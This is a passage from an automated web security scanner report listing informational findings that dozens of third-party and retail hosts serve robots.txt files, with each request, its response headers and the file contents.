Keep-Alive: timeout=300, max=797
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.27. http://dis.us.criteo.com/dis/dis.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dis.us.criteo.com
Path:	/dis/dis.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dis.us.criteo.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Mon, 16 May 2011 02:01:30 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

22.28. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dms.netmng.com
Path:	/si/CM/Tracking/ClickTracking.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dms.netmng.com

Response

HTTP/1.1 200 OK
Content-Length: 52
Content-Type: text/plain
Last-Modified: Thu, 31 Aug 2006 14:18:42 GMT
Accept-Ranges: bytes
ETag: "bbd5705c8cdc61:2196"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:53:27 GMT
Connection: close

User-agent: *
Disallow: /images/
Disallow: /SI/CM/

22.29. http://feeds.bbci.co.uk/news/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=2324
Expires: Mon, 16 May 2011 11:19:51 GMT
Date: Mon, 16 May 2011 10:41:07 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

22.30. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 16 May 2011 01:53:14 GMT
Server: Floodlight server
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

22.31. http://gnc.imageg.net/min-cat/site-css.xml.min.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gnc.imageg.net
Path:	/min-cat/site-css.xml.min.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gnc.imageg.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 22 Apr 2011 08:47:00 GMT
ETag: "67872c-12a-4a17de6ae2900"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/plain; charset=ISO-8859-1
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:57:42 GMT
Date: Mon, 16 May 2011 01:57:42 GMT
Content-Length: 298
Connection: close

User-agent: *
Disallow: /search/
Disallow: /coreg/
Disallow: /gcoreg/
Disallow: /cart/
Disallow: /cartHandler/
Disallow: /include/
Disallow: /checkout/
Disallow: /emailFriend/
Disallow: /emailSignup/

...[SNIP]...

22.32. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1052618686/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/viewthroughconversion/1052618686/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 16 May 2011 01:55:55 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

22.33. http://gsicace.112.2o7.net/b/ss/gsicace/1/H.20.3/s01026654783636 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gsicace.112.2o7.net
Path:	/b/ss/gsicace/1/H.20.3/s01026654783636

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gsicace.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:12 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "2602fa-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www423
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.34. http://hire.jobvite.com/CompanyJobs/Careers.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hire.jobvite.com
Path:	/CompanyJobs/Careers.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: hire.jobvite.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 20 Jul 2010 18:27:10 GMT
Accept-Ranges: bytes
ETag: "093692a3928cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:22:19 GMT
Connection: close
Content-Length: 210

##############################
# Exclude robots from these

User-agent: *
Disallow: /Jobs/
Disallow: /Login/
Disallow: /CompanyJobs/PreviewApplication.aspx

###############################
...[SNIP]...

22.35. http://images.scanalert.com/meter/www.mcafee.com/55.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.scanalert.com
Path:	/meter/www.mcafee.com/55.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: images.scanalert.com

Response

HTTP/1.0 200 OK
Server: McAfeeSecure
ETag: "EKdW2Rg2Pnr"
Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Content-Length: 44
Date: Mon, 16 May 2011 02:06:37 GMT
Connection: close
Cache-Control: private

# Allow Everything
User-agent: *
Disallow:

22.36. http://login.dotomi.com/ucm/UCMController previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://login.dotomi.com
Path:	/ucm/UCMController

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:04 GMT
Server: Apache
X-Name: dmc-o01
Set-Cookie: Apache=173.193.214.243.1305510844293361; path=/
Last-Modified: Tue, 23 Nov 2010 00:49:00 GMT
ETag: "3500070-a2-495adbd05d700"
Accept-Ranges: bytes
Content-Length: 162
Connection: close
Content-Type: text/plain

#do not edit this file in ms-platform, you need unix line seperators for it.
#this file will disallow any robots to search the dmc.
User-Agent: *
Disallow: /

22.37. http://marketlive.122.2o7.net/b/ss/mlhelzbprod/1/H.20.3/s05609032628126 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://marketlive.122.2o7.net
Path:	/b/ss/mlhelzbprod/1/H.20.3/s05609032628126

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: marketlive.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:42 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "2882ec-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www45
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.38. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mbox12.offermatica.com
Path:	/m2/guitarcenter/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mbox12.offermatica.com

Response

HTTP/1.1 200 OK
ETag: W/"25-1299290853000"
Accept-Ranges: bytes
Content-Length: 25
Date: Mon, 16 May 2011 01:53:41 GMT
Connection: close
Last-Modified: Sat, 05 Mar 2011 02:07:33 GMT
Server: Test & Target
Content-Type: text/plain

User-agent: *
Disallow: /

22.39. http://media.gnc.com/ipixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.gnc.com
Path:	/ipixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media.gnc.com

Response

22.40. http://media.gsimedia.net/ipixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.gsimedia.net
Path:	/ipixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media.gsimedia.net

Response

22.41. http://media2.legacy.com/bind previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/bind

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media2.legacy.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /

22.42. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.brookstone.com
Path:	/b/ss/bstoneprod/1/H.21/s01194140000734

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.brookstone.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:56 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "26023c-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www276
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.43. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s04212323604151 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.ftd.com
Path:	/b/ss/ftdprod/1/H.4-pdv-2/s04212323604151

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:38 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "21914a-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www335
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.44. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s06308770310133 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.gnc.com
Path:	/b/ss/gsicgncf/1/H.20.3/s06308770310133

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:44 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "30c178-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www611
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.45. http://metrics.mcafee.com/b/ss/mcafeecomglobal/1/H.21/s0464884343091 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.mcafee.com
Path:	/b/ss/mcafeecomglobal/1/H.21/s0464884343091

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.mcafee.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:39 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "29d14a-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www297
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.46. http://metrics.pacsun.com/b/ss/pacsuncom/1/H.21/s03375264031346 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.pacsun.com
Path:	/b/ss/pacsuncom/1/H.21/s03375264031346

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.pacsun.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:28 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "612f5b-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www2
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.47. http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s02726066182367 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.petsmart.com
Path:	/b/ss/gsicpet/1/H.20.3/s02726066182367

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:15 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "37018e-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www628
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.48. http://mlarmani.122.2o7.net/b/ss/mlax5prod/1/H.10-Pdvu-2/s03885870138183 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mlarmani.122.2o7.net
Path:	/b/ss/mlax5prod/1/H.10-Pdvu-2/s03885870138183

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mlarmani.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:01 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "1781c9-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www425
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.49. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=83094420
Expires: Thu, 02 Jan 2014 04:28:05 GMT
Date: Mon, 16 May 2011 10:41:05 GMT
Connection: close

User-agent: *
Disallow: /

22.50. http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s07987988402601 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://o.toshibadirect.com
Path:	/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s07987988402601

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: o.toshibadirect.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:41 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "1b0236-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www434
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.51. https://ordering.ftd.com/signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/signin/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ordering.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:10:01 GMT
Server: Apache
Set-Cookie: TLTSID=9B29B4147F61107F00208AA83DF009D5; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=9B29B4147F61107F00208AA83DF009D5; Path=/; Domain=.ftd.com; expires=Mon, 16-05-2021 02:10:01 GMT
Vary: Accept-Encoding
Last-Modified: Wed, 19 Jan 2011 03:55:49 GMT
ETag: "ba-4d3660c5"
Accept-Ranges: bytes
Content-Length: 186
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /1
Disallow: /2
Disallow: /3
Disallow: /4
Disallow: /5
Disallow: /6
Disallow: /7
Disallow: /8
Disallow: /9

Allow: /350/

Sitemap: http://www.ftd.com/sitemap.xml

22.52. http://pet.imageg.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pet.imageg.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pet.imageg.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 14 Aug 2009 08:45:06 GMT
ETag: "53c0d0-15b-4711611a3a880"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/plain; charset=ISO-8859-1
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 10:49:57 GMT
Date: Mon, 16 May 2011 10:49:57 GMT
Content-Length: 347
Connection: close

User-agent: *
Disallow: /search/
Disallow: /cart/
Disallow: /coreg/
Disallow: /checkout/
Disallow: /compare/
Disallow: /history/
Disallow: /include/
Disallow: /pop_ups/
Disallow: /cgi-bin/
Disallow: /
...[SNIP]...

22.53. http://pixel.mathtag.com/event/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x2 pid 0x6ff 1791
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

22.54. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Mon, 16 May 2011 01:56:38 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

22.55. http://rpt.footlocker.com/eluminate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rpt.footlocker.com
Path:	/eluminate

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rpt.footlocker.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:28 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "3a991c-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=970
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.56. http://rs.instantservice.com/resources/smartbutton/7664/44640/available.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.instantservice.com
Path:	/resources/smartbutton/7664/44640/available.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rs.instantservice.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:03:21 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 14:43:25 GMT
ETag: "1a-443ebd40"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /

22.57. http://s.petco.com/js_raw/mtagconfig.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.petco.com
Path:	/js_raw/mtagconfig.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.petco.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Aug 2010 21:52:58 GMT
ETag: "bc6b7cbbb135cb1:107a"
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
X-Strangeloop: RCache
X-SL-RCache: Cached
Date: Mon, 16 May 2011 01:57:24 GMT
Content-Length: 267
Connection: close
Set-Cookie: sltest=T; path=/; domain=petco.com.

# Spider instructions for all web servers in the production pool
# Thu, 11 Dec 2008 06:18:00 -0400

# Exclude Files From All Robots:

User-agent: *
Disallow: /secure/
Disallow: /cart/
Disa
...[SNIP]...

22.58. http://s.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.xp1.ru4.com
Path:	/meta

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.xp1.ru4.com

Response

22.59. https://secure.bhphotovideo.com/bnh/controller/home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.bhphotovideo.com
Path:	/bnh/controller/home

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.bhphotovideo.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 09 Apr 2011 03:06:15 GMT
ETag: "491-4d9fcd27"
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:17:41 GMT
Content-Length: 1169
Connection: close

User-agent: *
Disallow: /c/search*
Disallow: /search*
Disallow: /federal
Disallow: */edu
Disallow: /c/find/
Disallow: /impact/
Disallow: /find/organizational-sales.jsp*
Disallow: /find/gsa.jsp
Disallo
...[SNIP]...

22.60. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.homedepot.ca
Path:	/webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.homedepot.ca

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Mar 2011 16:39:36 GMT
Content-Type: text/plain
Date: Mon, 16 May 2011 02:10:40 GMT
Content-Length: 379
Connection: close
Cache-Control: max-age=315360000
Expires: Mon, 10 May 2021 11:15:19 GMT

User-agent: *

Disallow: /webapp/wcs/stores/servlet/DisplayTemplate?storeId=10051&catalogId=10051&langId=-15&display=services_holmes
Disallow: /webapp/wcs/stores/servlet/DisplayTemplate?storeId=10051&
...[SNIP]...

22.61. http://segment-pixel.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 01:54:22 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.62. http://server.bhphotovideo.com/cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://server.bhphotovideo.com
Path:	/cm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: server.bhphotovideo.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:00 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "4f7b4-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=954
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.63. http://shop.pacsun.com/home.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.pacsun.com
Path:	/home.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: shop.pacsun.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 09 Jun 2008 19:20:11 GMT
Accept-Ranges: bytes
Content-Length: 208
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:58:44 GMT
Connection: close

# robots.txt for http://shop.pacsun.com/

User-agent: *
Disallow: /assets
Disallow: /checkout
Disallow: /includes
Disallow: /user
Disallow: / assets
Disallow: / checkout
Disallow: / includes
Disallow:
...[SNIP]...

22.64. http://srv.clickfuse.com/pixels/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://srv.clickfuse.com
Path:	/pixels/create.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: srv.clickfuse.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Date: Mon, 16 May 2011 02:03:00 GMT
ETag: "500df-1a-496ec5f4a5d80"
Last-Modified: Wed, 08 Dec 2010 20:57:42 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

22.65. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.138.17.185
Date: Mon, 16 May 2011 10:34:09 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

22.66. http://static.bhphotovideo.com/FrameWork/css/min/reset-fonts-layout.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.bhphotovideo.com
Path:	/FrameWork/css/min/reset-fonts-layout.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.bhphotovideo.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 09 Apr 2011 03:06:15 GMT
ETag: "491-4d9fcd27"
Cache-Control: no-cache
Date: Mon, 16 May 2011 01:53:00 GMT
Content-Length: 1169
Connection: close

User-agent: *
Disallow: /c/search*
Disallow: /search*
Disallow: /federal
Disallow: */edu
Disallow: /c/find/
Disallow: /impact/
Disallow: /find/organizational-sales.jsp*
Disallow: /find/gsa.jsp
Disallo
...[SNIP]...

22.67. http://subscriptions.marvel.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://subscriptions.marvel.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: subscriptions.marvel.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:32 GMT
Server: Apache
Last-Modified: Thu, 16 Dec 2010 13:58:57 GMT
ETag: "38-74744a40"
Accept-Ranges: bytes
Content-Length: 56
Vary: Accept-Encoding
X-ServerNickName: Mj
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /confirm/
Disallow: /checkout/

22.68. https://subscriptions.marvel.com/checkout/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://subscriptions.marvel.com
Path:	/checkout/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: subscriptions.marvel.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:36:25 GMT
Server: Apache
Last-Modified: Thu, 16 Dec 2010 14:02:04 GMT
ETag: "38-7f99af00"
Accept-Ranges: bytes
Content-Length: 56
Vary: Accept-Encoding
X-ServerNickName: Venom
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /confirm/
Disallow: /checkout/

22.69. http://sv.liveclicker.net/service/api previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sv.liveclicker.net
Path:	/service/api

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sv.liveclicker.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:03 GMT
Server: Apache
Last-Modified: Thu, 25 Jun 2009 13:05:29 GMT
ETag: "111db5-2b-e0c6f840"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Disallow: /service/

22.70. http://sync.mathtag.com/sync/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x5 pid 0x2214 8724
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

22.71. http://t.p.mybuys.com/webrec/wr.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t.p.mybuys.com
Path:	/webrec/wr.do

